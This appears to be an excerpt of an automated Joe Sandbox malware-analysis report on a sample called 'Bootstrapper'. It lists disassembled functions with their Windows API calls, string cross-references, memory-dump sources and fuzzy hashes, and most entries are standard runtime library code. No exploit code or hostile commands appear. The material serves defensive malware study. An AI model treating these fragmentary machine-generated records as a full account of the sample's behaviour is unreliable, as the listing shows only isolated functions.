Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E2985D
Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863

Part of subcall function 00E2BB4E: _abort.LIBCMT ref: 00E2BB80
Part of subcall function 00E2BB4E: _free.LIBCMT ref: 00E2BBB4

Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6

_free.LIBCMT ref: 00E2BA9F
_free.LIBCMT ref: 00E2BAD5

Strings

p, xrefs: 00E2BAC9

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p
API String ID: 2991157371-2678736219
Opcode ID: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
Instruction ID: 535c6cfac8ea7e88287c51ce57dd4fc963ba1283a0bdcbaad235eee0ca1f1046
Opcode Fuzzy Hash: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
Instruction Fuzzy Hash: 3131F971904229AFDB10DFA9E945B9DBBF5FF40324F215099E404BB2A2EB325D44DB50

Function 00E1E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

(, xrefs: 00E1E528
PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: ($PDu<
API String ID: 1269201914-2719109745
Opcode ID: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
Instruction ID: 37f53b912e062228ba8e63f134be7f13e2ba06ee2a569e0095013d93f6c1f832
Opcode Fuzzy Hash: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
Instruction Fuzzy Hash: C0B012E12981407C314852182D07CBB094EC4C1F20330B02EFC04F0680E8804C860631

Function 00E1E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

2, xrefs: 00E1E532
PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2$PDu<
API String ID: 1269201914-683690134
Opcode ID: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
Instruction ID: 2fba59fa9fe11bfbda55e5afd79302d6d18944aa11756d38ae28cc8af4234724
Opcode Fuzzy Hash: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
Instruction Fuzzy Hash: 80B012E129D1007D314852182C07DBB054EC4C1F20330702EFC04F0680E8804C850631

Function 00E09F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E0D343,00000001,?,?,?,00000000,00E1551D,?,?,?), ref: 00E09F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00E1551D,?,?,?,?,?,00E14FC7,?), ref: 00E09FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E0D343,00000001,?,?), ref: 00E0A011

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
Instruction ID: ec1ec458ac572e64f050aef16783072de3dc5a2ce1a80cf9b3bd9bdee818ade1
Opcode Fuzzy Hash: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
Instruction Fuzzy Hash: 3D31A27120830AAFDB14CF20D818BBE77A5EF94715F045529F981BB2D1C7759D88CBA2

Function 00E0A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00E0C27E: _wcslen.LIBCMT ref: 00E0C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A30C
GetLastError.KERNEL32(?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A329

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
Instruction ID: 78f9f0ec172a58eebe26235fa87734d1a79dd920d371cadd8e1970ab197182b8
Opcode Fuzzy Hash: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
Instruction Fuzzy Hash: 2F01B53560031C6AEF21AB758C0ABED36889F09784F0C5474F901F60D1D758DAC186B6

Function 00E2B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E2B8B8

Strings

, xrefs: 00E2B8FD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
Instruction ID: b3556f9593a62bd1c48c3322b1886471920becaf08b0ac23b385d6d2ec95d523
Opcode Fuzzy Hash: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
Instruction Fuzzy Hash: 1E412A7090426C9EDF258E28DC84BF6BBF9EB45308F1414EDE59AA6142D3359A85CF60

Function 00E2AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00E2AFDD

Strings

LCMapStringEx, xrefs: 00E2AF7D, 00E2AF87

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
Instruction ID: c51dab29f90214945fcba43622dfdf61eb620c66ba5e5935be455aea262d4656
Opcode Fuzzy Hash: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
Instruction Fuzzy Hash: A501177260421EBBCF129F91ED06DEE7FA2EB48750F054254FE1475160C6368931EB81

Function 00E2AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E2A56F), ref: 00E2AF55

Strings

InitializeCriticalSectionEx, xrefs: 00E2AF1B, 00E2AF25

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
Instruction ID: 183e8777e42a5757f5af3d7d249a68ee9b6304caabc2cbce9cfa2922dea952a1
Opcode Fuzzy Hash: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
Instruction Fuzzy Hash: 2DF0B47164921CBFCB215F65DC0ADAEBFA1EF44711F014165FD0876260DA314A10E785

Function 00E2ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00E2ADEE

Strings

FlsAlloc, xrefs: 00E2ADC0, 00E2ADCA

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
Instruction ID: c69a9eea4ae54c6c9c2cab317c3be4af381201dfaa470db0f708b39e0a5693af
Opcode Fuzzy Hash: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
Instruction Fuzzy Hash: ABE0E57164532C7BC721AB6AEC0AE6EBF94EB44721F0612A9FC05B7350CD715E4086D6

Function 00E1E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 17be36d5385cd73e65f79ef34102c257c575723e540b31b670fe968fc041017a
Instruction ID: 4f7a06c21ee78c78edeed93754cf35c15fc222aee765de995bae4de79640a273
Opcode Fuzzy Hash: 17be36d5385cd73e65f79ef34102c257c575723e540b31b670fe968fc041017a
Instruction Fuzzy Hash: CDB012F539E200BC310851692C0BCF7014CE4C2B10330703EFC06F0281D840AC810631

Function 00E1E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: e806f20eec07a210b0a7007ad5e0005b02fe1bd09388ca98db33e06e3a13685e
Instruction ID: 42b8e53bd812aa6e9d3c6931724739ab0074297b3ea976400ac1c05344efd680
Opcode Fuzzy Hash: e806f20eec07a210b0a7007ad5e0005b02fe1bd09388ca98db33e06e3a13685e
Instruction Fuzzy Hash: 0DB012F139A100BC310856252C0BCF7014CD4C2B20330F13EFC06F0381D840EC850531

Function 00E1E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: d0efae108d92534a5b3534ce57b45ae9d38349787206e8f089610ccf2b9fe716
Instruction ID: f2dc236f5bd2efc6b1338cb1b4a89ad90a03d494f2d32157fbd1ae82b99bbf62
Opcode Fuzzy Hash: d0efae108d92534a5b3534ce57b45ae9d38349787206e8f089610ccf2b9fe716
Instruction Fuzzy Hash: 28B012F539A200BC310811652C0BCF7010CD4C3B10330B43EFC02F0581D840EC810431

Function 00E1EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1EAF9

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

3Ro, xrefs: 00E1EAE7, 00E1EAF3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
Instruction ID: b33a577b0ba359fef881318291db26ddc7aa38b6054e8f122af9969afaa12374
Opcode Fuzzy Hash: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
Instruction Fuzzy Hash: 75B092E629A1427C310862102907CBA4148C8D1F90330B12AB800B4181988158860431

Function 00E1E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: c5831cff4802c4c16eeda68be79c8074815cab8adf24f256c2acd4a436778652
Instruction ID: b58b8d8b998c0e657094dfe6ac98dd6813cc4a80b20c5114888fd478ae1d0629
Opcode Fuzzy Hash: c5831cff4802c4c16eeda68be79c8074815cab8adf24f256c2acd4a436778652
Instruction Fuzzy Hash: 97B012F139A100BC310851252D0BCF701CCD4C1B10730703EFC06F0280DC40ADC20531

Function 00E1E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 105e847eaa4acfea812f61b72cfb0620133d5ccc5d1699573cf076b38665793c
Instruction ID: b8728bdc934c8c329472156d62e40e023147af90f704546a48453aece0d2e9d3
Opcode Fuzzy Hash: 105e847eaa4acfea812f61b72cfb0620133d5ccc5d1699573cf076b38665793c
Instruction Fuzzy Hash: 89B012F13AB140BC310851252C0BCF7118DE9C1B10730703EFC07F0280D840AC810531

Function 00E1E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 02b189cdbfe70e904bf54c8602d001ec17e781a1fe32f900c78b50d1918c9163
Instruction ID: eb509df9d55fa5701b5288cd41ccc8fa5a35cd3de2475c667dd5a62f485052e9
Opcode Fuzzy Hash: 02b189cdbfe70e904bf54c8602d001ec17e781a1fe32f900c78b50d1918c9163
Instruction Fuzzy Hash: 37B012F139A100BC310851352C0BCF7018CD4C2B10330B03EFC06F0280D840ECC10531

Function 00E1E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
